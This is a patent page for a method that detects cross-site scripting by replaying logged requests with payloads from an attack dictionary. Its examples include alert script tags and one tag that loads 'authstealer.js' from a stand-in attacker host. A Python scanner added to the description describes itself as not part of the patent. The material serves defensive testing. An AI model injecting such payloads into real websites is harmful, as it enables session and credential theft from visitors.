CN105049440B - Method and system for detecting cross-site scripting attack injection - Google Patents

Method and system for detecting cross-site scripting attack injection

Info

Publication number: CN105049440B
Authority: CN (China)
Prior art keywords: request, injection, module, parameter, attack
Legal status (an assumption, not a legal conclusion): Active
Application number: CN201510476875.3A
Other languages: Chinese (zh)
Other versions: CN105049440A
Inventors: 陈丛亮, 刘德建, 毛新生
Current assignee: Fujian TQ Digital Co Ltd
Original assignee: Fujian TQ Digital Co Ltd
Priority date and filing date: 2015-08-06
Publication dates: 2015-11-11 (CN105049440A), 2018-04-10 (CN105049440B)

Application filed by Fujian TQ Digital Co Ltd
Priority to CN201510476875.3A
Publication of CN105049440A
Application granted
Publication of CN105049440B
Legal status: Active

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441 Countermeasures against malicious traffic
    • H04L63/1466 Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
    • H04L63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416 Event detection, e.g. attack signature detection

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer And Data Communications (AREA)

Abstract

The invention discloses a method and system for detecting cross-site scripting attack injection. The method includes: a reverse proxy module records the request log of user accesses; the request log is grouped and classified to generate URL parameters, which are saved; the parameter names and parameter values in the URL parameters are detected respectively; the parameter value is replaced with the corresponding content of a script injection attack dictionary list to generate a second request; the second request is sent to the destination server and the returned response is received; whether the returned response contains the attack content is judged; if so, the URL parameter is included in an injection risk list. By the above means, the invention can detect more comprehensively the XSS vulnerabilities present in a website, reduce the risk of users being attacked, improve site security, and detect a more complete set of URLs than the crawler approach does.

Description

Method and system for detecting cross-site scripting attack injection
Technical field
The present invention relates to a method and system for detecting cross-site scripting attack injection.
Background
Cross-site scripting (Cross Site Scripting) is abbreviated as XSS so that it is not confused with the abbreviation for Cascading Style Sheets (CSS). A malicious attacker inserts malicious HTML code into a Web page; when a user browses that page, the HTML code embedded in it is executed, thereby achieving the attacker's specific purpose of maliciously attacking the user.
XSS is a type of computer security vulnerability that frequently appears in web applications. It allows a malicious web user to implant code into pages that are served to other users; such code includes, for example, HTML code and client-side scripts. Attackers use XSS vulnerabilities to bypass access controls such as the same-origin policy. These vulnerabilities became widely known because hackers used them to write more harmful phishing attacks. Regarding cross-site scripting, the consensus in the hacker community is that cross-site scripting is the new "buffer overflow attack" and JavaScript is the new "shellcode".
At present, many websites discover their cross-site scripting vulnerabilities by traversing the website with a crawler. Handled this way, request tracking is not comprehensive enough and the testing is not sufficiently complete.
An existing patent application (application number 201510046908.0) proposes a cross-site vulnerability scanning method and system. The method comprises the following steps: crawling the whole-site or single-page links of the target site; filtering the crawled links by preset conditions to obtain a plurality of potential cross-site vulnerability links; fuzz testing each potential cross-site vulnerability link with attack vectors; during the fuzz testing, dynamically analyzing the web page source code of each potential cross-site vulnerability link as viewed in a browsing module, to judge whether the potential cross-site vulnerability link actually has a cross-site vulnerability; and saving the links that have a cross-site vulnerability, together with the attack vectors loaded for them, to a database. That patent fuzz tests every potential link with attack vectors, so the workload is large and the demands on hardware configuration are high.
Summary of the invention
The technical problem to be solved by the invention is: by configuring a reverse proxy module, extracting the variable parameters from all request information, injecting a test dictionary and carrying out cross-site scripting attack tests to obtain the return values, to detect more comprehensively the XSS vulnerabilities present in a website, reduce the risk of users being attacked, improve site security, and detect a more complete set of URLs than the crawler approach does.
To solve the above technical problem, the technical solution adopted by the present invention is to provide a method for detecting cross-site scripting attack injection, including:
a reverse proxy module records the request log of user accesses;
the request log is grouped and classified to generate URL parameters, which are saved;
the parameter names and parameter values in the URL parameters are detected respectively;
the parameter value is replaced with the corresponding content of a script injection attack dictionary list to generate a second request;
the second request is sent to the destination server and the returned response is received;
whether the returned response contains the attack content is judged;
if so, the URL parameter is included in an injection risk list.
To solve the above problem, the present invention also provides a system for detecting cross-site scripting attack injection, including:
a reverse proxy module, for recording the request log of user accesses;
a classification and saving module, for grouping and classifying the request log, generating URL parameters and saving them;
a detection module, for detecting the parameter names and parameter values in the URL parameters;
a replacement and generation module, for replacing the parameter value with the corresponding content of a script injection attack dictionary list to generate a second request;
a sending/receiving module, for sending the second request to the destination server and receiving the returned response;
a judgment module, for judging whether the returned response contains the attack content;
a list module, for including the URL parameter in an injection risk list.
The beneficial effects of the present invention are: unlike the prior art, by configuring a reverse proxy module, extracting the variable parameters from all request information, injecting a test dictionary and carrying out cross-site scripting attack tests to obtain the return values, the XSS vulnerabilities present in a website are detected more comprehensively, the risk of users being attacked is reduced, site security is improved, and a more complete set of URLs is detected than with the crawler approach.
Brief description of the drawings
Fig. 1 is a schematic flow chart of method embodiment one of the invention;
Fig. 2 is a schematic flow chart of method embodiment two of the invention;
Fig. 3 is a structural block diagram of system embodiment three of the invention;
Fig. 4 is a structural block diagram of system embodiment four of the invention.
Detailed description
To describe in detail the technical content, objects and effects of the present invention, the following explanation is given in conjunction with the embodiments and the accompanying drawings.
The most critical design of the present invention is: the cross-site scripting attack injection request is analyzed and subjected to replacement processing, the second request is sent and the response is judged, thereby detecting cross-site scripting attack injection into the system.
Referring to Fig. 1, embodiment one of the present invention provides a method for detecting cross-site scripting attacks, comprising the following steps:
S1: a reverse proxy module records the request log of user accesses;
S2: the request log is grouped and classified to generate URL parameters, which are saved;
S3: the parameter names and parameter values in the URL parameters are detected respectively;
S4: the parameter value is replaced with the corresponding content of a script injection attack dictionary list to generate a second request;
S5: the second request is sent to the destination server and the returned response is received;
S6: whether the returned response contains the attack content is judged;
if so, step S7 is performed: the URL parameter is included in an injection risk list.
As shown in Fig. 2, on the basis of embodiment one, embodiment two of the present invention further includes, before step S1:
S01: configuring the reverse proxy module;
S02: resolving the domain name to the reverse proxy module.
Step S4 specifically comprises:
S41: replacing the parameter value in turn with each corresponding content of the script injection attack dictionary list;
S42: after the replacements, generating the corresponding at least one second request.
After step S6, the method further includes:
if not, performing step S70: ignoring the returned response.
In a specific embodiment, the following preparation can be made in advance before defending:
A reverse proxy module is configured to record all request logs of user accesses. The reverse proxy module can be a reverse proxy server, or an application with a logging function that the system already provides, such as IIS, Apache or Nginx. A proxy server usually serves the user's client, whereas a reverse proxy server serves the server side.
The advantage of configuring a reverse proxy module, compared with directly using the logging function the system provides, is that the original server configuration need not be changed; only the reverse proxy server needs to be configured.
After configuration, the domain name is resolved to the reverse proxy module.
In the specific testing process, the user accesses the reverse proxy server, which records the content of all the requests by which the user accessed the website and saves them as the request log. The URLs in the request log are then grouped and classified by URL and parameters, generating the URL parameters of the website. Specifically, the URL can be split at ? and &, for example: http://abc.com/?id=1&name=abc. Its parameter names are id and name, the corresponding parameter values are 1 and abc respectively, and the part of the URL without parameters is http://abc.com/.
The program then detects the parameter names and parameter values in the saved URLs separately, and replaces the parameter value 1 with the corresponding content of a commonly used script injection attack dictionary list to generate the replaced request, i.e. the second request.
Specifically, the URL can be split at the keywords ? and &, after which the parameter values can be replaced one by one with a regular expression (the form being: parameter name=parameter). The corresponding content of the attack dictionary list consists of the keywords or blocks that are commonly injected, such as <script></script> tag blocks and keywords such as onclick and javascript. It should be understood that, because the attack dictionary list may contain more than one item, at least one replaced request may be generated after replacement.
The replaced request is resent to the destination server, and whether the returned response contains the attack content is detected.
Usually, an HTTP request is sent to the website under test that is being accessed; the website under test returns an HTTP response, and it is then detected whether the content of that response contains the attack content of the request.
If the attack content of the detection request is contained, this URL parameter is included in the XSS injection risk list.
If the attack content of the detection request is not contained, the returned response is ignored directly, the next second request is sent to the destination server, and steps S5 to S7 are performed in a loop until all replaced requests have been tested; the URL parameters meeting the condition are included in the XSS injection risk list.
A concrete example is as follows: on the website http://abc.com/, the reverse proxy log records the GET request http://abc.com/?id=1. Using the script injection attack dictionary (the dictionary contains many use cases that can be injected, for testing one by one), the parameter value 1 is replaced by a regular expression with the attack strings in the dictionary (i.e. the corresponding content of the list).
For example: http://abc.com/?id=<Script type='text/javascript'>alert('pwnd');</script>; or
<Script type='text/javascript'>alert('pwnd');</script>; or
<Script%20src="http://mallorysevilsite.com/authstealer.js">.
In this example, for instance, the regular expression (id=)[^&]* is used to replace the match with $1<Script type='text/javascript'>alert('pwnd');</script>
The result is the attack string http://abc.com/?id=<Script type='text/javascript'>alert('pwnd');</script>.
It is then detected whether the content of the returned response contains this script, and whether it has not been escaped. If so, this URL has an injection risk.
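The pipeline of steps S1 to S7 described above, written out as an added Python example (it is not code from the patent or from Fujian TQ Digital): it parses a constructed reverse-proxy access log, splits each URL at ? and &, groups the observed values by parameter-less URL and parameter name, substitutes every dictionary entry using the page's (id=)[^&]* regex generalised to any parameter name, and checks whether the destination server echoes the attack string back unescaped. The destination server is replaced by a constructed stand-in function (simulated_target) rather than a real HTTP client, the sample log lines and the dictionary entries other than the page's alert('pwnd') example are invented for the demonstration, and all function names are the example's own.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed reverse-proxy access log (nginx combined-log style); invented for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0800] "GET /?id=1&name=abc HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2024:10:00:02 +0800] "GET /?id=2&name=xyz HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0800] "GET /search?q=hello HTTP/1.1" 200 128 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0800] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Script injection attack dictionary: the page's alert('pwnd') example plus two keyword probes
# of the onclick / javascript kind the description mentions. Constructed, not the patent's list.
ATTACK_DICTIONARY = [
    "<Script type='text/javascript'>alert('pwnd');</script>",
    '" onclick="alert(1)',
    "javascript:alert(1)",
]

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')


def split_url(url):
    """The page's step of splitting a URL at ? and &: returns the parameter-less URL
    and an ordered list of (name, value) pairs. No percent-decoding is applied."""
    base, sep, query = url.partition("?")
    params = []
    if sep:
        for pair in query.split("&"):
            if pair:
                name, _, value = pair.partition("=")
                params.append((name, value))
    return base, params


def group_request_log(log_text, host="http://abc.com"):
    """S1-S3: take each logged GET request, split its URL, and group the observed
    values by (parameter-less URL, parameter name)."""
    groups = {}
    for line in log_text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m or m.group("method") != "GET":
            continue
        base, params = split_url(host + m.group("target"))
        for name, value in params:
            groups.setdefault((base, name), set()).add(value)
    return {key: sorted(values) for key, values in groups.items()}


def substitute_parameter(url, name, payload):
    """S4: the page's regex replacement (id=)[^&]* -> $1<payload>, generalised to any
    parameter name and anchored at ? or & so that 'd' does not match inside 'id='."""
    pattern = re.compile(r"((?:[?&])%s=)[^&]*" % re.escape(name))
    return pattern.sub(lambda m: m.group(1) + payload, url, count=1)


def generate_second_requests(groups, dictionary=ATTACK_DICTIONARY):
    """S41-S42: one second request per (URL parameter, dictionary entry); the first
    observed value is the request that gets mutated."""
    second = []
    for (base, name), values in groups.items():
        original = "%s?%s=%s" % (base, name, values[0])
        for payload in dictionary:
            second.append((base, name, payload, substitute_parameter(original, name, payload)))
    return second


def needs_manual_confirmation(payload):
    """A dictionary entry without <, >, &, " or ' reads the same whether or not the
    server escaped it, so a hit on it proves reflection, not unescaped output."""
    return html.escape(payload, quote=True) == payload


def simulated_target(url):
    """Constructed stand-in for the destination server of S5: /search escapes q,
    / escapes name but echoes id unescaped, so id is the reflected-XSS sink."""
    base, params = split_url(url)
    values = dict(params)
    if urlsplit(base).path == "/search":
        return "<p>Results for %s</p>" % html.escape(values.get("q", ""))
    return "<p>id=%s name=%s</p>" % (values.get("id", ""), html.escape(values.get("name", "")))


def scan(log_text, send=simulated_target, dictionary=ATTACK_DICTIONARY):
    """S5-S7 looped over every second request; a response that does not reflect the
    payload is ignored (S70). Returns the injection risk list."""
    risk_list = []
    for base, name, payload, url in generate_second_requests(group_request_log(log_text), dictionary):
        body = send(url)
        if payload in body:  # S6: attack content present verbatim in the response
            risk_list.append({"url": base, "parameter": name, "payload": payload,
                              "confirmed": not needs_manual_confirmation(payload)})
    return risk_list


if __name__ == "__main__":
    for entry in scan(SAMPLE_LOG):
        print(entry)
```

Run against the constructed log, the scan lists id on http://abc.com/ as a confirmed risk for the two payloads that contain HTML-special characters, while the bare keyword probe javascript:alert(1) is reported for name and q as well even though the stand-in server escapes those parameters. That is the caveat the "not escaped" check in the description hints at: a dictionary entry made only of keywords cannot distinguish escaped from unescaped output, so such hits are marked unconfirmed and need review before they are treated as findings.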
In summary, the embodiment of the present invention records the request log with a reverse proxy module and resolves the domain name; after grouping and classifying the log it generates URL parameters, which serve as the basis and preparation for defense. It then uses the injection test dictionary to perform XSS injection tests on the parameters, obtains whether the return values contain the attack content, and finally includes the parameters so identified in the injection risk list. Embodiment two of the present invention can therefore detect more comprehensively the XSS injection vulnerabilities present in a website, reduce the risk of users being attacked, improve site security, and detect a more complete set of URLs than the crawler approach does.
As shown in Fig. 3, embodiment three of the present invention provides a system 100 for detecting cross-site scripting attacks, including:
a reverse proxy module 110, for recording the request log of user accesses;
a classification and saving module 120, for grouping and classifying the request log, generating URL parameters and saving them;
a detection module 130, for detecting the parameter names and parameter values in the URL parameters;
a replacement and generation module 140, for replacing the parameter value with the corresponding content of a script injection attack dictionary list to generate a second request;
a sending/receiving module 150, for sending the second request to the destination server 200 and receiving the returned response;
a judgment module 160, for judging whether the returned response contains the attack content;
a list module 170, for including the URL parameter in an injection risk list.
The system 100 of embodiment four of the present invention further includes:
a configuration module 180, for configuring the reverse proxy service module;
a resolution module 190, for resolving the domain name to the reverse proxy service module.
The replacement and generation module 140 further includes:
a replacement unit 141, for replacing the parameter value in turn with each corresponding content of the script injection attack dictionary list;
a generation unit 142, for generating the corresponding second request after the replacements.
When the judgment module 160 judges that the returned response does not contain the attack content, the returned response is ignored.
The above are only embodiments of the invention and do not limit the scope of the invention; any equivalent transformation made using the contents of the specification and drawings of the invention, or direct or indirect use in related technical fields, is likewise included in the scope of patent protection of the invention.

Claims (6)

  1. A method for detecting cross-site scripting attack injection, characterized in that it includes:
    a reverse proxy module records the request log of user accesses;
    the request log is grouped and classified to generate URL parameters, which are saved;
    the parameter names and parameter values in the URL parameters are detected respectively;
    the parameter value is replaced with the corresponding content of a script injection attack dictionary list to generate a second request;
    the second request is sent to the destination server and the returned response is received;
    whether the returned response contains the attack content is judged;
    if so, the URL parameter is included in an injection risk list;
    wherein the step of replacing the parameter value with the corresponding content of the script injection attack dictionary list to generate the second request specifically comprises:
    replacing the parameter value in turn with each corresponding content of the script injection attack dictionary list;
    after the replacements, generating the corresponding at least one second request.
  2. The method for detecting cross-site scripting attack injection according to claim 1, characterized in that, before the step in which the reverse proxy service module records the request log of user accesses, it further includes:
    configuring the reverse proxy module;
    resolving the domain name to the reverse proxy module.
  3. The method for detecting cross-site scripting attack injection according to claim 1, characterized in that, after the step of judging whether the returned response contains the attack content, it further includes:
    if not, ignoring the returned response.
  4. A system for detecting cross-site scripting attack injection, characterized in that it includes:
    a reverse proxy module, for recording the request log of user accesses;
    a classification and saving module, for grouping and classifying the request log, generating URL parameters and saving them;
    a detection module, for detecting the parameter names and parameter values in the URL parameters;
    a replacement and generation module, for replacing the parameter value with the corresponding content of a script injection attack dictionary list to generate a second request;
    a sending/receiving module, for sending the second request to the destination server and receiving the returned response;
    a judgment module, for judging whether the returned response contains the attack content;
    a list module, for including the URL parameter in an injection risk list.
  5. The system for detecting cross-site scripting attack injection according to claim 4, characterized in that it further includes:
    a configuration module, for configuring the reverse proxy service module;
    a resolution module, for resolving the domain name to the reverse proxy service module.
  6. The system for detecting cross-site scripting attack injection according to claim 4, characterized in that, after the judgment module judges that the returned response does not contain the attack content, the returned response is ignored.

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201510476875.3A CN105049440B (en) 2015-08-06 2015-08-06 Detect the method and system of cross-site scripting attack injection

Publications (2)

Publication Number Publication Date
CN105049440A CN105049440A (en) 2015-11-11
CN105049440B true CN105049440B (en) 2018-04-10

Family

ID=54455651

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201510476875.3A Active CN105049440B (en) 2015-08-06 2015-08-06 Detect the method and system of cross-site scripting attack injection

Country Status (1)

Country Link
CN (1) CN105049440B (en)

Families Citing this family (10)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN107948120B (en) * 2016-10-12 2020-11-24 阿里巴巴集团控股有限公司 Vulnerability detection method and device
CN106446694A (en) * 2016-12-13 2017-02-22 四川长虹电器股份有限公司 Xss vulnerability mining system based on network crawlers
CN108632219B (en) * 2017-03-21 2021-04-27 腾讯科技(深圳)有限公司 Website vulnerability detection method, detection server, system and storage medium
CN108667770B (en) * 2017-03-29 2020-12-18 腾讯科技(深圳)有限公司 Website vulnerability testing method, server and system
CN109040054B (en) * 2018-07-30 2020-12-04 杭州迪普科技股份有限公司 URL filtering test method and device
CN111104675A (en) * 2019-11-15 2020-05-05 泰康保险集团股份有限公司 Method and device for detecting system security vulnerability
CN113364815B (en) * 2021-08-11 2021-11-23 飞狐信息技术(天津)有限公司 Cross-site scripting vulnerability attack defense method and device
CN113965363B (en) * 2021-10-11 2023-07-14 北京天融信网络安全技术有限公司 Vulnerability research and judgment method and device based on Web user behaviors
CN114205123A (en) * 2021-11-20 2022-03-18 湖北天融信网络安全技术有限公司 Attack and defense confrontation-based threat hunting method, device, equipment and storage medium
CN114816558B (en) * 2022-03-07 2023-06-30 深圳市九州安域科技有限公司 Script injection method, equipment and computer readable storage medium

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN102880830A (en) * 2011-07-15 2013-01-16 华为软件技术有限公司 Acquisition method and device of original test data
CN102999420A (en) * 2011-09-13 2013-03-27 阿里巴巴集团控股有限公司 XSS (Cross Site Scripting) testing method and XSS testing system based on DOM (Document Object Model)
CN103023869A (en) * 2012-11-02 2013-04-03 北京奇虎科技有限公司 Malicious attack prevention method and browser

Family Cites Families (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN103067344B (en) * 2011-10-24 2016-03-30 国际商业机器公司 The noninvasive method of automatic distributing safety regulation and equipment in cloud environment

Also Published As

Publication number Publication date
CN105049440A (en) 2015-11-11

Legal Events

Date Code Title Description
C06 Publication
PB01 Publication
C10 Entry into substantive examination
SE01 Entry into force of request for substantive examination
GR01 Patent grant